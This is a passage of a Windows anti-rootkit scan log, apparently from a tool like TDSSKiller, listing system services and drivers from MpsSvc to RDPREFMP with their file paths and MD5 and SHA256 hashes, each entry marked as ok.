09:35:31.0742 0x0ff0  [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc          C:\Windows\system32\mpssvc.dll
09:35:31.0780 0x0ff0  MpsSvc - ok
09:35:31.0822 0x0ff0  [ 1A4F75E63C9FB84B85DFFC6B63FD5404, 01AFA6DBB4CDE55FE4EA05BBE8F753A4266F8D072EA1EE01DB79F5126780C21F ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
09:35:31.0834 0x0ff0  MRxDAV - ok
09:35:31.0856 0x0ff0  [ A5D9106A73DC88564C825D317CAC68AC, 0457B2AEA4E05A91D0E43F317894A614434D8CEBE35020785387F307E231FBE4 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
09:35:31.0880 0x0ff0  mrxsmb - ok
09:35:31.0904 0x0ff0  [ D711B3C1D5F42C0C2415687BE09FC163, 9B3013AC60BD2D0FF52086658BA5FF486ADE15954A552D7DD590580E8BAE3EFF ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
09:35:31.0917 0x0ff0  mrxsmb10 - ok
09:35:31.0929 0x0ff0  [ 9423E9D355C8D303E76B8CFBD8A5C30C, 220B33F120C2DD937FE4D5664F4B581DC0ACF78D62EB56B7720888F67B9644CC ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
09:35:31.0944 0x0ff0  mrxsmb20 - ok
09:35:31.0974 0x0ff0  [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci          C:\Windows\system32\drivers\msahci.sys
09:35:31.0981 0x0ff0  msahci - ok
09:35:31.0993 0x0ff0  [ DB801A638D011B9633829EB6F663C900, B34FD33A215ACCF2905F4B7D061686CDB1CB9C652147AF56AE14686C1F6E3C74 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
09:35:32.0003 0x0ff0  msdsm - ok
09:35:32.0012 0x0ff0  [ DE0ECE52236CFA3ED2DBFC03F28253A8, 2FBBEC4CACB5161F68D7C2935852A5888945CA0F107CF8A1C01F4528CE407DE3 ] MSDTC           C:\Windows\System32\msdtc.exe
09:35:32.0032 0x0ff0  MSDTC - ok
09:35:32.0048 0x0ff0  [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] Msfs            C:\Windows\system32\drivers\Msfs.sys
09:35:32.0069 0x0ff0  Msfs - ok
09:35:32.0081 0x0ff0  [ F9D215A46A8B9753F61767FA72A20326, 6F76642B45E0A7EF6BCAB8B37D55CCE2EAA310ED07B76D43FCB88987C2174141 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
09:35:32.0102 0x0ff0  mshidkmdf - ok
09:35:32.0108 0x0ff0  [ D916874BBD4F8B07BFB7FA9B3CCAE29D, B229DA150713DEDBC4F05386C9D9DC3BC095A74F44F3081E88311AB73BC992A1 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
09:35:32.0115 0x0ff0  msisadrv - ok
09:35:32.0128 0x0ff0  [ 808E98FF49B155C522E6400953177B08, F873F5BFF0984C5165DF67E92874D3F6EB8D86F9B5AD17013A0091CA33A1A3D5 ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
09:35:32.0153 0x0ff0  MSiSCSI - ok
09:35:32.0155 0x0ff0  msiserver - ok
09:35:32.0171 0x0ff0  [ 49CCF2C4FEA34FFAD8B1B59D49439366, E5752EA57C7BDAD5F53E3BC441A415E909AC602CAE56234684FB8789A20396C7 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
09:35:32.0199 0x0ff0  MSKSSRV - ok
09:35:32.0256 0x0ff0  [ F0D5494D8B177C37E16966262F5D0F68, DD63427DFFD9DD2BEC8336F6AD1BEFE347012331631DC5FEC65E83B1EACDBC67 ] MsMpSvc         c:\Program Files\Microsoft Security Client\MsMpEng.exe
09:35:32.0263 0x0ff0  MsMpSvc - ok
09:35:32.0287 0x0ff0  [ BDD71ACE35A232104DDD349EE70E1AB3, 27464A66868513BE6A01B75D7FC5B0D6B71842E4E20CE3F76B15C071A0618BBB ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
09:35:32.0309 0x0ff0  MSPCLOCK - ok
09:35:32.0329 0x0ff0  [ 4ED981241DB27C3383D72092B618A1D0, E12F121E641249DB3491141851B59E1496F4413EDF58E863388F1C229838DFCC ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
09:35:32.0360 0x0ff0  MSPQM - ok
09:35:32.0373 0x0ff0  [ 759A9EEB0FA9ED79DA1FB7D4EF78866D, 64E3BC613EC4872B1B344CBF71EE15BE195592E3244C1EE099C6F8B95A40F133 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
09:35:32.0386 0x0ff0  MsRPC - ok
09:35:32.0390 0x0ff0  [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] mssmbios        C:\Windows\system32\DRIVERS\mssmbios.sys
09:35:32.0397 0x0ff0  mssmbios - ok
09:35:32.0405 0x0ff0  [ 2E66F9ECB30B4221A318C92AC2250779, DF175E1AB6962303E57F26DAE5C5C1E40B8640333F3E352A64F6A5F1301586CD ] MSTEE           C:\Windows\system32\drivers\MSTEE.sys
09:35:32.0431 0x0ff0  MSTEE - ok
09:35:32.0440 0x0ff0  [ 7EA404308934E675BFFDE8EDF0757BCD, 306CD02D89CFCFE576242360ED5F9EEEDCAFC43CD43B7D2977AE960F9AEC3232 ] MTConfig        C:\Windows\system32\drivers\MTConfig.sys
09:35:32.0449 0x0ff0  MTConfig - ok
09:35:32.0458 0x0ff0  [ F9A18612FD3526FE473C1BDA678D61C8, 32F7975B5BAA447917F832D9E3499B4B6D3E90D73F478375D0B70B36C524693A ] Mup             C:\Windows\system32\Drivers\mup.sys
09:35:32.0466 0x0ff0  Mup - ok
09:35:32.0492 0x0ff0  [ 582AC6D9873E31DFA28A4547270862DD, BD540499F74E8F59A020D935D18E36A3A97C1A6EC59C8208436469A31B16B260 ] napagent        C:\Windows\system32\qagentRT.dll
09:35:32.0530 0x0ff0  napagent - ok
09:35:32.0583 0x0ff0  [ 1EA3749C4114DB3E3161156FFFFA6B33, 54C2E77BCE1037711A11313AC25B8706109098C10A31AA03AEB7A185E97800D7 ] NativeWifiP     C:\Windows\system32\DRIVERS\nwifi.sys
09:35:32.0615 0x0ff0  NativeWifiP - ok
09:35:32.0650 0x0ff0  [ 760E38053BF56E501D562B70AD796B88, F856E81A975D44F8684A6F2466549CEEDFAEB3950191698555A93A1206E0A42D ] NDIS            C:\Windows\system32\drivers\ndis.sys
09:35:32.0676 0x0ff0  NDIS - ok
09:35:32.0707 0x0ff0  [ 9F9A1F53AAD7DA4D6FEF5BB73AB811AC, D7E5446E83909AE25506BB98FBDD878A529C87963E3C1125C4ABAB25823572BC ] NdisCap         C:\Windows\system32\DRIVERS\ndiscap.sys
09:35:32.0729 0x0ff0  NdisCap - ok
09:35:32.0735 0x0ff0  [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] NdisTapi        C:\Windows\system32\DRIVERS\ndistapi.sys
09:35:32.0756 0x0ff0  NdisTapi - ok
09:35:32.0774 0x0ff0  [ 136185F9FB2CC61E573E676AA5402356, BA3AD0A33416DA913B4242C6BE8C3E5812AD2B20BA6C11DD3094F2E8EB56E683 ] Ndisuio         C:\Windows\system32\DRIVERS\ndisuio.sys
09:35:32.0795 0x0ff0  Ndisuio - ok
09:35:32.0804 0x0ff0  [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] NdisWan         C:\Windows\system32\DRIVERS\ndiswan.sys
09:35:32.0837 0x0ff0  NdisWan - ok
09:35:32.0848 0x0ff0  [ 015C0D8E0E0421B4CFD48CFFE2825879, 4242E2D42CCFC859B2C0275C5331798BC0BDA68E51CF4650B6E64B1332071023 ] NDProxy         C:\Windows\system32\drivers\NDProxy.sys
09:35:32.0869 0x0ff0  NDProxy - ok
09:35:32.0872 0x0ff0  [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] NetBIOS         C:\Windows\system32\DRIVERS\netbios.sys
09:35:32.0903 0x0ff0  NetBIOS - ok
09:35:32.0928 0x0ff0  [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] NetBT           C:\Windows\system32\DRIVERS\netbt.sys
09:35:32.0953 0x0ff0  NetBT - ok
09:35:32.0961 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] Netlogon        C:\Windows\system32\lsass.exe
09:35:32.0970 0x0ff0  Netlogon - ok
09:35:32.0995 0x0ff0  [ 847D3AE376C0817161A14A82C8922A9E, 37AE692B3481323134125EF58F2C3CBC20177371AF2F5874F53DD32A827CB936 ] Netman          C:\Windows\System32\netman.dll
09:35:33.0029 0x0ff0  Netman - ok
09:35:33.0071 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetMsmqActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0082 0x0ff0  NetMsmqActivator - ok
09:35:33.0086 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetPipeActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0096 0x0ff0  NetPipeActivator - ok
09:35:33.0118 0x0ff0  [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] netprofm        C:\Windows\System32\netprofm.dll
09:35:33.0158 0x0ff0  netprofm - ok
09:35:33.0164 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0173 0x0ff0  NetTcpActivator - ok
09:35:33.0177 0x0ff0  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing c:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
09:35:33.0186 0x0ff0  NetTcpPortSharing - ok
09:35:33.0221 0x0ff0  [ 77889813BE4D166CDAB78DDBA990DA92, 2EF531AE502B943632EEC66A309A8BFCDD36120A5E1473F4AAF3C2393AD0E6A3 ] nfrd960         C:\Windows\system32\drivers\nfrd960.sys
09:35:33.0229 0x0ff0  nfrd960 - ok
09:35:33.0266 0x0ff0  [ F9EEFFC65C68A45001D1349E652B8B6F, E5F223129416083A12A85D48C65B2C8D1BF1124110399938E144308C89F9241D ] NisDrv          C:\Windows\system32\DRIVERS\NisDrvWFP.sys
09:35:33.0275 0x0ff0  NisDrv - ok
09:35:33.0331 0x0ff0  [ 9690F420A99364C1E5C439914B0DE25C, 6C6E0B27C4255001FE5F1EAD911DE1A8BF922C405B0C8031A6BD253CEB1D02A6 ] NisSrv          c:\Program Files\Microsoft Security Client\NisSrv.exe
09:35:33.0346 0x0ff0  NisSrv - ok
09:35:33.0373 0x0ff0  [ 8AD77806D336673F270DB31645267293, E23F324913554A23CD043DD27D4305AF62F48C0561A0FC7B7811E55B74B1BE79 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:35:33.0392 0x0ff0  NlaSvc - ok
09:35:33.0407 0x0ff0  [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:35:33.0429 0x0ff0  Npfs - ok
09:35:33.0438 0x0ff0  npggsvc - ok
09:35:33.0446 0x0ff0  [ D54BFDF3E0C953F823B3D0BFE4732528, 497A1DCC5646EC22119273216DF10D5442D16F83E4363770F507518CF6EAA53A ] nsi             C:\Windows\system32\nsisvc.dll
09:35:33.0475 0x0ff0  nsi - ok
09:35:33.0483 0x0ff0  [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:35:33.0514 0x0ff0  nsiproxy - ok
09:35:33.0578 0x0ff0  [ 1A29A59A4C5BA6F8C85062A613B7E2B2, CC137F499A12C724D4166C2D85E9F447413419A0683DAC6F1A802B7F210C77F1 ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:35:33.0631 0x0ff0  Ntfs - ok
09:35:33.0697 0x0ff0  [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] Null            C:\Windows\system32\drivers\Null.sys
09:35:33.0718 0x0ff0  Null - ok
09:35:33.0741 0x0ff0  [ 786DB821BFD57C0551DBBE4F75384A7D, F956D636F834F2BA5F019E187FDB9CC33940363C75A60E53CD81310A4DB6A6AB ] nusb3hub        C:\Windows\system32\drivers\nusb3hub.sys
09:35:33.0751 0x0ff0  nusb3hub - ok
09:35:33.0765 0x0ff0  [ DAA8005CAF745042BB427A1ED7433354, 3019002F174783B76D5D8AA47F7A465B7FEC7C14235B70E5C9277FE534839226 ] nusb3xhc        C:\Windows\system32\drivers\nusb3xhc.sys
09:35:33.0775 0x0ff0  nusb3xhc - ok
09:35:33.0815 0x0ff0  [ B9E5A80F646DDFEF158773722A466EA3, 028979FE600D17DA70445F44D81FAE4EDA3478FCC81FA5506133CCAC37C4E2BF ] NVHDA           C:\Windows\system32\drivers\nvhda64v.sys
09:35:33.0838 0x0ff0  NVHDA - ok
09:35:34.0141 0x0ff0  [ DF2213CF2DD81B790B85541D138D93C7, F00AC7991770C22C89C891009CFDCA3A445279235389F67B6412DBE468D70F5F ] nvlddmkm        C:\Windows\system32\DRIVERS\nvlddmkm.sys
09:35:34.0328 0x0ff0  nvlddmkm - ok
09:35:34.0508 0x0ff0  [ 72DD6225BA6055472522195F96473639, 27C8F847B247645061C0CD6DFCC986DA27638A9DFE686040160DFDCF7B3A6E72 ] NvNetworkService C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
09:35:35.0065 0x0ff0  NvNetworkService - ok
09:35:35.0095 0x0ff0  [ 0A92CB65770442ED0DC44834632F66AD, 581327F07A68DBD5CC749214BE5F1211FC2CE41C7A4F0656B680AFB51A35ACE7 ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:35:35.0106 0x0ff0  nvraid - ok
09:35:35.0126 0x0ff0  [ DAB0E87525C10052BF65F06152F37E4A, AD9BFF0D5FD3FFB95C758B478E1F6A9FE45E7B37AEC71EB5070D292FEAAEDF37 ] nvstor          C:\Windows\system32\drivers\nvstor.sys
09:35:35.0136 0x0ff0  nvstor - ok
09:35:35.0257 0x0ff0  [ 4680DDDDDBA1CB1D56D49B4A6134155C, BF6E538BC10B23F6D93143F5C48155245852798D4846F401E0DA70A5BCFC74E1 ] NvStreamKms     C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
09:35:35.0263 0x0ff0  NvStreamKms - ok
09:35:35.0713 0x0ff0  [ E14F52B60581EE71849CD45186892046, 72B3E92CD34489306AB7D794C4C1F67513DE80C72A847DCF7A3EEFE2254762D0 ] NvStreamSvc     C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
09:35:36.0798 0x0ff0  NvStreamSvc - ok
09:35:36.0915 0x0ff0  [ F029A2C032B4A50DEBB21312CFF76189, F47F0FC39AF6DFC8A9A3F0A486357BE76B8BD0753135B567FDB6E213D11893FD ] nvsvc           C:\Windows\system32\nvvsvc.exe
09:35:36.0937 0x0ff0  nvsvc - ok
09:35:37.0005 0x0ff0  [ 35DFC12FD7E44B7CB8CCD7E5A2B3975A, 36E0E39646636F6E027691E5C3903C51479B3F707BDEA40F460FD27E357DA14E ] nvvad_WaveExtensible C:\Windows\system32\drivers\nvvad64v.sys
09:35:37.0023 0x0ff0  nvvad_WaveExtensible - ok
09:35:37.0049 0x0ff0  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
09:35:37.0059 0x0ff0  nv_agp - ok
09:35:37.0073 0x0ff0  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
09:35:37.0083 0x0ff0  ohci1394 - ok
09:35:37.0241 0x0ff0  [ D06C2368C93396C6B983CE60523BA99F, ABC90E2DC2DE577AFA37BF34630502AA209C9556DFCC1757844D95D9370FFA8C ] Origin Client Service C:\Program Files (x86)\Origin\OriginClientService.exe
09:35:37.0358 0x0ff0  Origin Client Service - ok
09:35:37.0399 0x0ff0  [ 7A07F911655BA3723EB98F3DDFA56E4B, 83180ECE3DA2EA4BDB3F8F4A482A47DA4DB11046D014288839D7753807D3D57E ] ossrv           C:\Windows\system32\drivers\ctoss2k.sys
09:35:37.0419 0x0ff0  ossrv - ok
09:35:37.0449 0x0ff0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
09:35:37.0469 0x0ff0  p2pimsvc - ok
09:35:37.0488 0x0ff0  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
09:35:37.0506 0x0ff0  p2psvc - ok
09:35:37.0529 0x0ff0  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\drivers\parport.sys
09:35:37.0540 0x0ff0  Parport - ok
09:35:37.0551 0x0ff0  [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
09:35:37.0560 0x0ff0  partmgr - ok
09:35:37.0575 0x0ff0  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc          C:\Windows\System32\pcasvc.dll
09:35:37.0600 0x0ff0  PcaSvc - ok
09:35:37.0618 0x0ff0  [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci             C:\Windows\system32\drivers\pci.sys
09:35:37.0629 0x0ff0  pci - ok
09:35:37.0643 0x0ff0  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\drivers\pciide.sys
09:35:37.0651 0x0ff0  pciide - ok
09:35:37.0665 0x0ff0  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\drivers\pcmcia.sys
09:35:37.0676 0x0ff0  pcmcia - ok
09:35:37.0690 0x0ff0  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
09:35:37.0699 0x0ff0  pcw - ok
09:35:37.0722 0x0ff0  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
09:35:37.0761 0x0ff0  PEAUTH - ok
09:35:37.0800 0x0ff0  [ B9B0A4299DD2D76A4243F75FD54DC680, BBF62E9628131FA396EB08D63B76D2D5FBDD61339E92B759125A066470D1C039 ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
09:35:37.0880 0x0ff0  PeerDistSvc - ok
09:35:37.0927 0x0ff0  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
09:35:37.0937 0x0ff0  PerfHost - ok
09:35:37.0978 0x0ff0  [ 89DA093A491F4478A6753B44C341ECE3, AE15FE7548653A156974FA86243CEC29460DD8C41476EDDBDFFCDA449CE66490 ] Phosgene        C:\Windows\system32\DRIVERS\Phosgene.sys
09:35:37.0994 0x0ff0  Phosgene - ok
09:35:38.0063 0x0ff0  [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla             C:\Windows\system32\pla.dll
09:35:38.0129 0x0ff0  pla - ok
09:35:38.0160 0x0ff0  [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
09:35:38.0177 0x0ff0  PlugPlay - ok
09:35:38.0201 0x0ff0  PnkBstrA - ok
09:35:38.0215 0x0ff0  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
09:35:38.0236 0x0ff0  PNRPAutoReg - ok
09:35:38.0248 0x0ff0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
09:35:38.0262 0x0ff0  PNRPsvc - ok
09:35:38.0286 0x0ff0  [ E4799B87675C59AA1F620DE5C6F113BB, 094EE16D4CEC68DB316002994482344A6BFCFDE399131F7FA11BB46C2DCBF218 ] Point64         C:\Windows\system32\DRIVERS\point64.sys
09:35:38.0294 0x0ff0  Point64 - ok
09:35:38.0321 0x0ff0  [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
09:35:38.0353 0x0ff0  PolicyAgent - ok
09:35:38.0394 0x0ff0  [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power           C:\Windows\system32\umpo.dll
09:35:38.0430 0x0ff0  Power - ok
09:35:38.0448 0x0ff0  [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
09:35:38.0476 0x0ff0  PptpMiniport - ok
09:35:38.0482 0x0ff0  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\drivers\processr.sys
09:35:38.0502 0x0ff0  Processor - ok
09:35:38.0522 0x0ff0  [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc         C:\Windows\system32\profsvc.dll
09:35:38.0550 0x0ff0  ProfSvc - ok
09:35:38.0573 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
09:35:38.0582 0x0ff0  ProtectedStorage - ok
09:35:38.0596 0x0ff0  [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
09:35:38.0630 0x0ff0  Psched - ok
09:35:38.0707 0x0ff0  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\drivers\ql2300.sys
09:35:38.0752 0x0ff0  ql2300 - ok
09:35:38.0770 0x0ff0  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
09:35:38.0780 0x0ff0  ql40xx - ok
09:35:38.0799 0x0ff0  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
09:35:38.0816 0x0ff0  QWAVE - ok
09:35:38.0823 0x0ff0  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
09:35:38.0835 0x0ff0  QWAVEdrv - ok
09:35:38.0844 0x0ff0  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
09:35:38.0865 0x0ff0  RasAcd - ok
09:35:38.0915 0x0ff0  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
09:35:38.0937 0x0ff0  RasAgileVpn - ok
09:35:38.0950 0x0ff0  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
09:35:38.0974 0x0ff0  RasAuto - ok
09:35:38.0982 0x0ff0  [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
09:35:39.0012 0x0ff0  Rasl2tp - ok
09:35:39.0027 0x0ff0  [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan          C:\Windows\System32\rasmans.dll
09:35:39.0064 0x0ff0  RasMan - ok
09:35:39.0084 0x0ff0  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
09:35:39.0118 0x0ff0  RasPppoe - ok
09:35:39.0134 0x0ff0  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
09:35:39.0158 0x0ff0  RasSstp - ok
09:35:39.0208 0x0ff0  [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
09:35:39.0234 0x0ff0  rdbss - ok
09:35:39.0244 0x0ff0  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
09:35:39.0254 0x0ff0  rdpbus - ok
09:35:39.0267 0x0ff0  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
09:35:39.0288 0x0ff0  RDPCDD - ok
09:35:39.0312 0x0ff0  [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
09:35:39.0325 0x0ff0  RDPDR - ok
09:35:39.0336 0x0ff0  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
09:35:39.0367 0x0ff0  RDPENCDD - ok
09:35:39.0370 0x0ff0  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
